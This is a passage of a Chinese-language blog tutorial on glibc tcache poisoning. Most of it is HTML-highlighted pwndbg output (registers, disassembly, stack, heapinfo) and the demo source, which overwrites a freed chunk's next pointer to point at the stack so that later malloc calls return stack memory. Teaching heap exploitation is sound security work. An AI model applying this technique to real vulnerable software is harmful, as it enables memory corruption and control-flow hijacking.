class="err">+</span><span class="mi">269</span><span class="err">&gt;</span> <span class="no">lea</span> <span class="no">rdx</span><span class="p">,</span> <span class="p">[</span><span class="no">rbp</span> <span class="p">-</span> <span class="mi">0x18</span><span class="p">]</span> <span class="err">&lt;</span><span class="mi">0x7ffff7dd48b0</span><span class="err">&gt;</span> <span class="err">0</span><span class="nf">x55555555486b</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">273</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rax</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rbp</span> <span class="p">-</span> <span class="mi">8</span><span class="p">]</span> <span class="err">0</span><span class="nf">x55555555486f</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">277</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rax</span><span class="p">],</span> <span class="no">rdx</span> <span class="err">0</span><span class="nf">x555555554872</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">280</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">edi</span><span class="p">,</span> <span class="mi">0x80</span> <span class="err">0</span><span class="nf">x555555554877</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">285</span><span class="err">&gt;</span> <span class="no">call</span> <span class="no">malloc@plt</span> <span class="err">&lt;</span><span class="mi">0x555555554620</span><span class="err">&gt;</span> <span class="err">0</span><span class="nf">x55555555487c</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">290</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rdx</span><span class="p">,</span> <span class="no">rax</span> <span class="err">0</span><span class="nf">x55555555487f</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">293</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rax</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x2007da</span><span class="p">]</span> <span class="err">&lt;</span><span class="mi">0x555555755060</span><span class="err">&gt;</span> <span class="err">0</span><span class="nf">x555555554886</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">300</span><span class="err">&gt;</span> <span class="no">lea</span> <span class="no">rsi</span><span class="p">,</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x2eb</span><span class="p">]</span> <span class="err">0</span><span class="nf">x55555555488d</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">307</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rdi</span><span class="p">,</span> <span class="no">rax</span> <span class="err">0</span><span class="nf">x555555554890</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">310</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">eax</span><span class="p">,</span> <span class="mi">0</span> <span class="err">0</span><span class="nf">x555555554895</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">315</span><span class="err">&gt;</span> <span class="no">call</span> <span class="no">fprintf@plt</span> <span class="err">&lt;</span><span class="mi">0x555555554610</span><span class="err">&gt;</span> <span class="err">────────────────────────────────────[</span> <span class="nf">SOURCE</span> <span class="p">(</span><span class="no">CODE</span><span class="p">)</span> <span class="p">]</span><span class="err">────────────────────────────────────</span> <span class="err">18</span> <span class="nf">free</span><span class="p">(</span><span class="no">a</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">19</span> <span class="mi">20</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">Now</span> <span class="no">the</span> <span class="no">tcache</span> <span class="no">list</span> <span class="no">has</span> <span class="p">[</span> <span class="nv">%p</span> <span class="p">].</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">a</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">21</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">We</span> <span class="no">overwrite</span> <span class="no">the</span> <span class="no">first</span> <span class="nv">%lu</span> <span class="no">bytes</span> <span class="p">(</span><span class="no">fd</span><span class="err">/</span><span class="no">next</span> <span class="no">pointer</span><span class="p">)</span> <span class="no">of</span> <span class="no">the</span> <span class="no">data</span> <span class="no">at</span> <span class="nv">%p</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span> <span class="err">22</span> <span class="err">&#34;</span><span class="nf">to</span> <span class="no">point</span> <span class="no">to</span> <span class="no">the</span> <span class="no">location</span> <span class="no">to</span> <span class="no">control</span> <span class="p">(</span><span class="nv">%p</span><span class="p">).</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">sizeof</span><span class="p">(</span><span class="no">intptr_t</span><span class="p">),</span> <span class="no">a</span><span class="p">,</span> <span class="err">&amp;</span><span class="no">stack_var</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="err">►</span> <span class="mi">23</span> <span class="no">a</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="err">=</span> <span class="p">(</span><span class="no">intptr_t</span><span class="p">)</span><span class="err">&amp;</span><span class="no">stack_var</span><span class="c">; </span><span class="c"></span> <span class="mi">24</span> <span class="mi">25</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="mi">1</span><span class="no">st</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">):</span> <span class="nv">%p</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">))</span><span class="c">; </span><span class="c"></span> <span class="mi">26</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">Now</span> <span class="no">the</span> <span class="no">tcache</span> <span class="no">list</span> <span class="no">has</span> <span class="p">[</span> <span class="nv">%p</span> <span class="p">].</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="err">&amp;</span><span class="no">stack_var</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">27</span> <span class="mi">28</span> <span class="no">intptr_t</span> <span class="p">*</span><span class="no">b</span> <span class="err">=</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">)</span><span class="c">; </span><span class="c"></span><span class="err">────────────────────────────────────────</span><span class="p">[</span> <span class="no">STACK</span> <span class="p">]</span><span class="err">────────────────────────────────────────</span> <span class="err">00:0000│</span> <span class="nf">rsp</span> <span class="mi">0x7fffffffdfa0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="err">01:0008│</span> <span class="err">0</span><span class="nf">x7fffffffdfa8</span> <span class="err">—▸</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="err">02:0010│</span> <span class="err">0</span><span class="nf">x7fffffffdfb0</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe0a0</span> <span class="err">◂—</span> <span class="mi">0x1</span> <span class="err">03:0018│</span> <span class="err">0</span><span class="nf">x7fffffffdfb8</span> <span class="err">—▸</span> <span class="mi">0x555555756260</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">04:0020│</span> <span class="nf">rbp</span> <span class="mi">0x7fffffffdfc0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="err">05:0028│</span> <span class="err">0</span><span class="nf">x7fffffffdfc8</span> <span class="err">—▸</span> <span class="mi">0x7ffff7a3fa87</span> <span class="p">(</span><span class="no">__libc_start_main</span><span class="err">+</span><span class="mi">231</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">mov</span> <span class="no">edi</span><span class="p">,</span> <span class="no">eax</span> <span class="err">06:0030│</span> <span class="err">0</span><span class="nf">x7fffffffdfd0</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">07:0038│</span> <span class="err">0</span><span class="nf">x7fffffffdfd8</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe0a8</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe3c6</span> <span class="err">◂—</span> <span class="mi">0x346d2f656d6f682f</span> <span class="p">(</span><span class="err">&#39;/</span><span class="no">home</span><span class="err">/</span><span class="no">m4</span><span class="err">&#39;</span><span class="p">)</span> <span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">heapinfo</span> <span class="err">3886144</span> <span class="err">(0</span><span class="nf">x20</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">0</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x30</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">1</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x40</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">2</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x50</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">3</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x60</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">4</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x70</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">5</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x80</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">6</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x90</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">7</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">xa0</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">8</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">xb0</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">9</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="nl">top:</span> <span class="err">0</span><span class="nf">x5555557562e0</span> <span class="p">(</span><span class="no">size</span> <span class="p">:</span> <span class="mi">0x20d20</span><span class="p">)</span> <span class="no">last_remainder</span><span class="p">:</span> <span class="mi">0x0</span> <span class="p">(</span><span class="no">size</span> <span class="p">:</span> <span class="mi">0x0</span><span class="p">)</span> <span class="no">unsortbin</span><span class="p">:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x90</span><span class="p">)</span> <span class="no">tcache_entry</span><span class="p">[</span><span class="mi">7</span><span class="p">]:</span> <span class="mi">0x555555756260</span> <span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">n</span> <span class="err">25</span> <span class="nf">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="mi">1</span><span class="no">st</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">):</span> <span class="nv">%p</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">))</span><span class="c">; </span><span class="c"></span><span class="no">LEGEND</span><span class="p">:</span> <span class="no">STACK</span> <span class="err">|</span> <span class="no">HEAP</span> <span class="err">|</span> <span class="no">CODE</span> <span class="err">|</span> <span class="no">DATA</span> <span class="err">|</span> <span class="no">RWX</span> <span class="err">|</span> <span class="no">RODATA</span> <span class="err">──────────────────────────────────────[</span> <span class="nf">REGISTERS</span> <span class="p">]</span><span class="err">──────────────────────────────────────</span> <span class="nf">RAX</span> <span class="mi">0x555555756260</span> <span class="err">—▸</span> <span class="mi">0x7fffffffdfa8</span> <span class="err">—▸</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="nf">RBX</span> <span class="mi">0x0</span> <span class="nf">RCX</span> <span class="mi">0x0</span> <span class="nf">RDX</span> <span class="mi">0x7fffffffdfa8</span> <span class="err">—▸</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="nf">RDI</span> <span class="mi">0x0</span> <span class="nf">RSI</span> <span class="mi">0x7fffffffb900</span> <span class="err">◂—</span> <span class="mi">0x777265766f206557</span> <span class="p">(</span><span class="err">&#39;</span><span class="no">We</span> <span class="no">overw</span><span class="err">&#39;</span><span class="p">)</span> <span class="nf">R8</span> <span class="mi">0x7ffff7fd14c0</span> <span class="err">◂—</span> <span class="mi">0x7ffff7fd14c0</span> <span class="nf">R9</span> <span class="mi">0x7fffffffb78c</span> <span class="err">◂—</span> <span class="mi">0x8500000000</span> <span class="nf">R10</span> <span class="mi">0x0</span> <span class="nf">R11</span> <span class="mi">0x246</span> <span class="nf">R12</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="nf">R13</span> <span class="mi">0x7fffffffe0a0</span> <span class="err">◂—</span> <span class="mi">0x1</span> <span class="nf">R14</span> <span class="mi">0x0</span> <span class="nf">R15</span> <span class="mi">0x0</span> <span class="nf">RBP</span> <span class="mi">0x7fffffffdfc0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="nf">RSP</span> <span class="mi">0x7fffffffdfa0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="nf">RIP</span> <span class="mi">0x555555554872</span> <span class="p">(</span><span class="no">main</span><span class="err">+</span><span class="mi">280</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">mov</span> <span class="no">edi</span><span class="p">,</span> <span class="mi">0x80</span> <span class="err">───────────────────────────────────────[</span> <span class="nf">DISASM</span> <span class="p">]</span><span class="err">────────────────────────────────────────</span> <span class="err">0</span><span class="nf">x555555554867</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">269</span><span class="err">&gt;</span> <span class="no">lea</span> <span class="no">rdx</span><span class="p">,</span> <span class="p">[</span><span class="no">rbp</span> <span class="p">-</span> <span class="mi">0x18</span><span class="p">]</span> <span class="err">0</span><span class="nf">x55555555486b</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">273</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rax</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rbp</span> <span class="p">-</span> <span class="mi">8</span><span class="p">]</span> <span class="err">0</span><span class="nf">x55555555486f</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">277</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rax</span><span class="p">],</span> <span class="no">rdx</span> <span class="err">►</span> <span class="err">0</span><span class="nf">x555555554872</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">280</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">edi</span><span class="p">,</span> <span class="mi">0x80</span> <span class="err">0</span><span class="nf">x555555554877</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">285</span><span class="err">&gt;</span> <span class="no">call</span> <span class="no">malloc@plt</span> <span class="err">&lt;</span><span class="mi">0x555555554620</span><span class="err">&gt;</span> <span class="err">0</span><span class="nf">x55555555487c</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">290</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rdx</span><span class="p">,</span> <span class="no">rax</span> <span class="err">0</span><span class="nf">x55555555487f</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">293</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rax</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x2007da</span><span class="p">]</span> <span class="err">&lt;</span><span class="mi">0x555555755060</span><span class="err">&gt;</span> <span class="err">0</span><span class="nf">x555555554886</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">300</span><span class="err">&gt;</span> <span class="no">lea</span> <span class="no">rsi</span><span class="p">,</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x2eb</span><span class="p">]</span> <span class="err">0</span><span class="nf">x55555555488d</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">307</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rdi</span><span class="p">,</span> <span class="no">rax</span> <span class="err">0</span><span class="nf">x555555554890</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">310</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">eax</span><span class="p">,</span> <span class="mi">0</span> <span class="err">0</span><span class="nf">x555555554895</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">315</span><span class="err">&gt;</span> <span class="no">call</span> <span class="no">fprintf@plt</span> <span class="err">&lt;</span><span class="mi">0x555555554610</span><span class="err">&gt;</span> <span class="err">────────────────────────────────────[</span> <span class="nf">SOURCE</span> <span class="p">(</span><span class="no">CODE</span><span class="p">)</span> <span class="p">]</span><span class="err">────────────────────────────────────</span> <span class="err">20</span> <span class="nf">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">Now</span> <span class="no">the</span> <span class="no">tcache</span> <span class="no">list</span> <span class="no">has</span> <span class="p">[</span> <span class="nv">%p</span> <span class="p">].</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">a</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">21</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">We</span> <span class="no">overwrite</span> <span class="no">the</span> <span class="no">first</span> <span class="nv">%lu</span> <span class="no">bytes</span> <span class="p">(</span><span class="no">fd</span><span class="err">/</span><span class="no">next</span> <span class="no">pointer</span><span class="p">)</span> <span class="no">of</span> <span class="no">the</span> <span class="no">data</span> <span class="no">at</span> <span class="nv">%p</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span> <span class="err">22</span> <span class="err">&#34;</span><span class="nf">to</span> <span class="no">point</span> <span class="no">to</span> <span class="no">the</span> <span class="no">location</span> <span class="no">to</span> <span class="no">control</span> <span class="p">(</span><span class="nv">%p</span><span class="p">).</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">sizeof</span><span class="p">(</span><span class="no">intptr_t</span><span class="p">),</span> <span class="no">a</span><span class="p">,</span> <span class="err">&amp;</span><span class="no">stack_var</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">23</span> <span class="no">a</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="err">=</span> <span class="p">(</span><span class="no">intptr_t</span><span class="p">)</span><span class="err">&amp;</span><span class="no">stack_var</span><span class="c">; </span><span class="c"></span> <span class="mi">24</span> <span class="err">►</span> <span class="mi">25</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="mi">1</span><span class="no">st</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">):</span> <span class="nv">%p</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">))</span><span class="c">; </span><span class="c"></span> <span class="mi">26</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">Now</span> <span class="no">the</span> <span class="no">tcache</span> <span class="no">list</span> <span class="no">has</span> <span class="p">[</span> <span class="nv">%p</span> <span class="p">].</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="err">&amp;</span><span class="no">stack_var</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">27</span> <span class="mi">28</span> <span class="no">intptr_t</span> <span class="p">*</span><span class="no">b</span> <span class="err">=</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">29</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="mi">2</span><span class="no">st</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">):</span> <span class="nv">%p</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">b</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">30</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">We</span> <span class="no">got</span> <span class="no">the</span> <span class="no">control</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">)</span><span class="c">; </span><span class="c"></span><span class="err">────────────────────────────────────────</span><span class="p">[</span> <span class="no">STACK</span> <span class="p">]</span><span class="err">────────────────────────────────────────</span> <span class="err">00:0000│</span> <span class="nf">rsp</span> <span class="mi">0x7fffffffdfa0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="err">01:0008│</span> <span class="nf">rdx</span> <span class="mi">0x7fffffffdfa8</span> <span class="err">—▸</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="err">02:0010│</span> <span class="err">0</span><span class="nf">x7fffffffdfb0</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe0a0</span> <span class="err">◂—</span> <span class="mi">0x1</span> <span class="err">03:0018│</span> <span class="err">0</span><span class="nf">x7fffffffdfb8</span> <span class="err">—▸</span> <span class="mi">0x555555756260</span> <span class="err">—▸</span> <span class="mi">0x7fffffffdfa8</span> <span class="err">—▸</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="err">04:0020│</span> <span class="nf">rbp</span> <span class="mi">0x7fffffffdfc0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="err">05:0028│</span> <span class="err">0</span><span class="nf">x7fffffffdfc8</span> <span class="err">—▸</span> <span class="mi">0x7ffff7a3fa87</span> <span class="p">(</span><span class="no">__libc_start_main</span><span class="err">+</span><span class="mi">231</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">mov</span> <span class="no">edi</span><span class="p">,</span> <span class="no">eax</span> <span class="err">06:0030│</span> <span class="err">0</span><span class="nf">x7fffffffdfd0</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">07:0038│</span> <span class="err">0</span><span class="nf">x7fffffffdfd8</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe0a8</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe3c6</span> <span class="err">◂—</span> <span class="mi">0x346d2f656d6f682f</span> <span class="p">(</span><span class="err">&#39;/</span><span class="no">home</span><span class="err">/</span><span class="no">m4</span><span class="err">&#39;</span><span class="p">)</span> <span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">heapinfo</span> <span class="err">3886144</span> <span class="err">(0</span><span class="nf">x20</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">0</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x30</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">1</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x40</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">2</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x50</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">3</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x60</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">4</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x70</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">5</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x80</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">6</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x90</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">7</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">xa0</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">8</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">xb0</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">9</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="nl">top:</span> <span class="err">0</span><span class="nf">x5555557562e0</span> <span class="p">(</span><span class="no">size</span> <span class="p">:</span> <span class="mi">0x20d20</span><span class="p">)</span> <span class="no">last_remainder</span><span class="p">:</span> <span class="mi">0x0</span> <span class="p">(</span><span class="no">size</span> <span class="p">:</span> <span class="mi">0x0</span><span class="p">)</span> <span class="no">unsortbin</span><span class="p">:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x90</span><span class="p">)</span> <span class="no">tcache_entry</span><span class="p">[</span><span class="mi">7</span><span class="p">]:</span> <span class="mi">0x555555756260</span> <span class="p">--</span><span class="err">&gt;</span> <span class="mi">0x7fffffffdfa8</span> <span class="p">--</span><span class="err">&gt;</span> <span class="mi">0x555555554650</span> </code></pre></td></tr></table> </div> </div><p>此时，第 8 条 tcache 链的 next 已经被改成栈上的地址了。接下来类似 fastbin attack，只需进行两次 <code>malloc(128)</code> 即可控制栈上的空间。</p> <p>第一次 malloc</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">n</span> <span class="err">1</span><span class="nf">st</span> <span 